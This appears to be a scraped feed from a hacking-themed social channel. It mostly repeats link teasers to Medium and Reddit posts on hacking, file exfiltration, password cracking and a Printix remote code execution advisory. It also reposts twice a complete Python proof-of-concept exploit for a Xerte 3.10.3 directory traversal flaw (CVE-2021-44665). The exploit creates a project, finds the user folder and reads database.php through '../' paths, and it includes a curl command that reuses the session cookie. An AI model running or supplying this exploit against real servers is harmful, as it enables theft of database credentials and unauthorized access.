Hacking on Medium
Piratas informáticos intentan apuntar a funcionarios europeos para obtener información sobre…
https://cdn-images-1.medium.com/max/1523/0*ml-NxefiVnxadNGb
PUBLICADO EN 2 MARZO, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Piratas informáticos intentan apuntar a funcionarios europeos para obtener información sobre…
https://cdn-images-1.medium.com/max/1523/0*ml-NxefiVnxadNGb
PUBLICADO EN 2 MARZO, 2022POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Piratas informáticos intentan apuntar a funcionarios europeos para obtener información sobre refugiados y suministros ucranianos
PUBLICADO EN 2 MARZO, 2022POR EHACKING
Hacking on Medium
Information Gathering — First Step towards Website Hacking
https://cdn-images-1.medium.com/max/1200/1*gFCI5Mgb0AyFij1T9U6Sxg.jpeg
Hackers/penetration testers gather all possible information related to the website. In this blog, I will go through the main tools which …
Continue reading on Level Up Coding »
___________________________
@hacking_Attack
@Hacking_Video
Information Gathering — First Step towards Website Hacking
https://cdn-images-1.medium.com/max/1200/1*gFCI5Mgb0AyFij1T9U6Sxg.jpeg
Hackers/penetration testers gather all possible information related to the website. In this blog, I will go through the main tools which …
Continue reading on Level Up Coding »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Information Gathering — First Step towards Website Hacking
Hackers/penetration testers gather all possible information related to the website. In this blog, I will go through the main tools which …
Hacking on Medium
10 Easy Ways to Speed Up Your Internet Connection — Knowledge World
https://cdn-images-1.medium.com/max/1280/0*c5djeMyOFsvAErYf.png
𝟏𝟎 𝐄𝐚𝐬𝐲 𝐖𝐚𝐲𝐬 𝐭𝐨 𝐒𝐩𝐞𝐞𝐝 𝐔𝐩 𝐘𝐨𝐮𝐫 𝐈𝐧𝐭𝐞𝐫𝐧𝐞𝐭 𝐂𝐨𝐧𝐧𝐞𝐜𝐭𝐢𝐨𝐧 — 𝐊𝐧𝐨𝐰𝐥𝐞𝐝𝐠𝐞 𝐖𝐨𝐫𝐥𝐝
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
10 Easy Ways to Speed Up Your Internet Connection — Knowledge World
https://cdn-images-1.medium.com/max/1280/0*c5djeMyOFsvAErYf.png
𝟏𝟎 𝐄𝐚𝐬𝐲 𝐖𝐚𝐲𝐬 𝐭𝐨 𝐒𝐩𝐞𝐞𝐝 𝐔𝐩 𝐘𝐨𝐮𝐫 𝐈𝐧𝐭𝐞𝐫𝐧𝐞𝐭 𝐂𝐨𝐧𝐧𝐞𝐜𝐭𝐢𝐨𝐧 — 𝐊𝐧𝐨𝐰𝐥𝐞𝐝𝐠𝐞 𝐖𝐨𝐫𝐥𝐝
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
10 Easy Ways to Speed Up Your Internet Connection — Knowledge World
𝟏𝟎 𝐄𝐚𝐬𝐲 𝐖𝐚𝐲𝐬 𝐭𝐨 𝐒𝐩𝐞𝐞𝐝 𝐔𝐩 𝐘𝐨𝐮𝐫 𝐈𝐧𝐭𝐞𝐫𝐧𝐞𝐭 𝐂𝐨𝐧𝐧𝐞𝐜𝐭𝐢𝐨𝐧 — 𝐊𝐧𝐨𝐰𝐥𝐞𝐝𝐠𝐞 𝐖𝐨𝐫𝐥𝐝
Hacking on Medium
6 computer hacking terminology explained
https://cdn-images-1.medium.com/max/2600/1*SuJOoiVOZuh25jY0A37GDw.jpeg
Hacking in the computer science world is similar to breaking into someone’s property. There are many different ways adopted by these…
Continue reading on Level Up Coding »
___________________________
@hacking_Attack
@Hacking_Video
6 computer hacking terminology explained
https://cdn-images-1.medium.com/max/2600/1*SuJOoiVOZuh25jY0A37GDw.jpeg
Hacking in the computer science world is similar to breaking into someone’s property. There are many different ways adopted by these…
Continue reading on Level Up Coding »
___________________________
@hacking_Attack
@Hacking_Video
Medium
6 computer hacking terminology explained
Hacking in the computer science world is similar to breaking into someone’s property. There are many different ways adopted by these…
How did I find Directory Traversal attack using GitHub
Hello,Continue reading on Medium »
Read more...
Hello,Continue reading on Medium »
Read more...
Bash Tricks for File Exfiltration over HTTP/S using Flask
https://www.reddit.com/r/redteamsec/comments/t538a2/bash_tricks_for_file_exfiltration_over_https/
submitted by /u/cyberbutler (https://www.reddit.com/user/cyberbutler)
[link] (https://medium.com/maverislabs/bash-tricks-for-file-exfiltration-over-http-s-using-flask-112aed524ad?source=friends_link&sk=622646706c0d1981eec45acffc38cbfd) [comments] (https://www.reddit.com/r/redteamsec/comments/t538a2/bash_tricks_for_file_exfiltration_over_https/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/t538a2/bash_tricks_for_file_exfiltration_over_https/
submitted by /u/cyberbutler (https://www.reddit.com/user/cyberbutler)
[link] (https://medium.com/maverislabs/bash-tricks-for-file-exfiltration-over-http-s-using-flask-112aed524ad?source=friends_link&sk=622646706c0d1981eec45acffc38cbfd) [comments] (https://www.reddit.com/r/redteamsec/comments/t538a2/bash_tricks_for_file_exfiltration_over_https/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Bash Tricks for File Exfiltration over HTTP/S using Flask
Posted in r/redteamsec by u/cyberbutler • 1 point and 1 comment
Bash Tricks for File Exfiltration over HTTP/S using Flask
https://www.reddit.com/r/Pentesting/comments/t53gkd/bash_tricks_for_file_exfiltration_over_https/
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/t53gkd/bash_tricks_for_file_exfiltration_over_https/
___________________________
@hacking_Attack
@Hacking_Video
reddit
Bash Tricks for File Exfiltration over HTTP/S using Flask
Posted in r/Pentesting by u/cyberbutler • 2 points and 1 comment
submitted by /u/cyberbutler (https://www.reddit.com/user/cyberbutler)
[link] (https://medium.com/maverislabs/bash-tricks-for-file-exfiltration-over-http-s-using-flask-112aed524ad?source=friends_link&sk=622646706c0d1981eec45acffc38cbfd) [comments] (https://www.reddit.com/r/Pentesting/comments/t53gkd/bash_tricks_for_file_exfiltration_over_https/)
___________________________
@hacking_Attack
@Hacking_Video
[link] (https://medium.com/maverislabs/bash-tricks-for-file-exfiltration-over-http-s-using-flask-112aed524ad?source=friends_link&sk=622646706c0d1981eec45acffc38cbfd) [comments] (https://www.reddit.com/r/Pentesting/comments/t53gkd/bash_tricks_for_file_exfiltration_over_https/)
___________________________
@hacking_Attack
@Hacking_Video
Reddit
overview for cyberbutler
The u/cyberbutler community on Reddit. Reddit gives you the best of the internet in one place.
How did I find Directory Traversal attack using GitHub
https://medium.com/@1337Fenrir/how-did-i-find-directory-traversal-attack-using-github-9b051ed749ca?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@1337Fenrir/how-did-i-find-directory-traversal-attack-using-github-9b051ed749ca?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
How did I find Directory Traversal attack using GitHub
Hello,
Hello,Continue reading on Medium » (https://medium.com/@1337Fenrir/how-did-i-find-directory-traversal-attack-using-github-9b051ed749ca?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
How did I find Directory Traversal attack using GitHub
Hello,
What is the John The Riper(JTR)? How to use JTR?
https://mirabbasagalarov.medium.com/what-is-the-john-the-riper-jtr-how-to-use-jtr-31730ca3305c?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://mirabbasagalarov.medium.com/what-is-the-john-the-riper-jtr-how-to-use-jtr-31730ca3305c?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
What is the John The Riper(JTR)? How to use JTR?
What is the John The Riper?
What is the John The Riper?Continue reading on Medium » (https://mirabbasagalarov.medium.com/what-is-the-john-the-riper-jtr-how-to-use-jtr-31730ca3305c?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
What is the John The Riper(JTR)? How to use JTR?
What is the John The Riper?
What is the John The Riper(JTR)? How to use JTR?
What is the John The Riper?Continue reading on Medium »
Read more...
What is the John The Riper?Continue reading on Medium »
Read more...
Exploit Collector
Printix Client 1.3.1106.0 Remote Code Execution
___________________________
@hacking_Attack
@Hacking_Video
Printix Client 1.3.1106.0 Remote Code Execution
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Printix Client 1.3.1106.0 Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Xerte 3.10.3 Directory Traversal
https://4.bp.blogspot.com/-Nd-X_KvCLtU/WWlu3jy7alI/AAAAAAAAIIw/wd38Z8AjxRAJh0AdUZMKadOiqPJQRSLMgCLcBGAs/s1600/h101.png
Xerte versions 3.10.3 and below suffer from a directory traversal vulnerability.
MD5 |
Download
# Exploit Title: Xerte 3.10.3 - Directory Traversal (Authenticated)
# Date: 05/03/2021
# Exploit Author: Rik Lutz
# Vendor Homepage: https://xerte.org.uk
# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.9.zip
# Version: up until 3.10.3
# Tested on: Windows 10 XAMP
# CVE : CVE-2021-44665
# This PoC assumes guest login is enabled. Vulnerable url:
# https:// visit "Properties" (! symbol) -> Media and Quota -> Click file to download
# The userfiles-direcotry will be noted in the URL and/or when you download a file.
# They look like: <numbers-<username-<templatename
import requests
import re
xerte_base_url = "http://127.0.0.1"
file_to_grab = "/../../database.php"
php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here.
with requests.Session() as session:
# Get a PHP session ID
if not php_session_id:
session.get(xerte_base_url)
else:
session.cookies.set("PHPSESSID", php_session_id)
# Use a default template
data = {
'tutorialid': 'Nottingham',
'templatename': 'Nottingham',
'tutorialname': 'exploit',
'folder_id': ''
}
# Create a new project in order to create a user-folder
template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)
# Find template ID
data = {
'template_id': re.findall('(\d+)', template_id.text)[0]
}
# Find the created user-direcotry:
user_direcotry = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)
user_direcotry = re.findall('USER-FILES\/([0-9]+-[a-z0-9]+-[a-zA-Z0-9_]+)', user_direcotry.text)[0]
# Grab file
result = session.get(xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)
print(result.text)
print("|-- Used Variables: --|")
print("PHP Session ID: " + session.cookies.get_dict()['PHPSESSID'])
print("user direcotry: " + user_direcotry)
print("Curl example:")
print('curl --cookie "PHPSESSID=' + session.cookies.get_dict()['PHPSESSID'] + '" ' + xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)
</code>
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Xerte 3.10.3 Directory Traversal
https://4.bp.blogspot.com/-Nd-X_KvCLtU/WWlu3jy7alI/AAAAAAAAIIw/wd38Z8AjxRAJh0AdUZMKadOiqPJQRSLMgCLcBGAs/s1600/h101.png
Xerte versions 3.10.3 and below suffer from a directory traversal vulnerability.
MD5 |
26e7456440c05b36c8a1440493e0c60bDownload
# Exploit Title: Xerte 3.10.3 - Directory Traversal (Authenticated)
# Date: 05/03/2021
# Exploit Author: Rik Lutz
# Vendor Homepage: https://xerte.org.uk
# Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.9.zip
# Version: up until 3.10.3
# Tested on: Windows 10 XAMP
# CVE : CVE-2021-44665
# This PoC assumes guest login is enabled. Vulnerable url:
# https:// visit "Properties" (! symbol) -> Media and Quota -> Click file to download
# The userfiles-direcotry will be noted in the URL and/or when you download a file.
# They look like: <numbers-<username-<templatename
import requests
import re
xerte_base_url = "http://127.0.0.1"
file_to_grab = "/../../database.php"
php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here.
with requests.Session() as session:
# Get a PHP session ID
if not php_session_id:
session.get(xerte_base_url)
else:
session.cookies.set("PHPSESSID", php_session_id)
# Use a default template
data = {
'tutorialid': 'Nottingham',
'templatename': 'Nottingham',
'tutorialname': 'exploit',
'folder_id': ''
}
# Create a new project in order to create a user-folder
template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data)
# Find template ID
data = {
'template_id': re.findall('(\d+)', template_id.text)[0]
}
# Find the created user-direcotry:
user_direcotry = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data)
user_direcotry = re.findall('USER-FILES\/([0-9]+-[a-z0-9]+-[a-zA-Z0-9_]+)', user_direcotry.text)[0]
# Grab file
result = session.get(xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)
print(result.text)
print("|-- Used Variables: --|")
print("PHP Session ID: " + session.cookies.get_dict()['PHPSESSID'])
print("user direcotry: " + user_direcotry)
print("Curl example:")
print('curl --cookie "PHPSESSID=' + session.cookies.get_dict()['PHPSESSID'] + '" ' + xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)
</code>
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Xerte 3.10.3 Directory Traversal
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.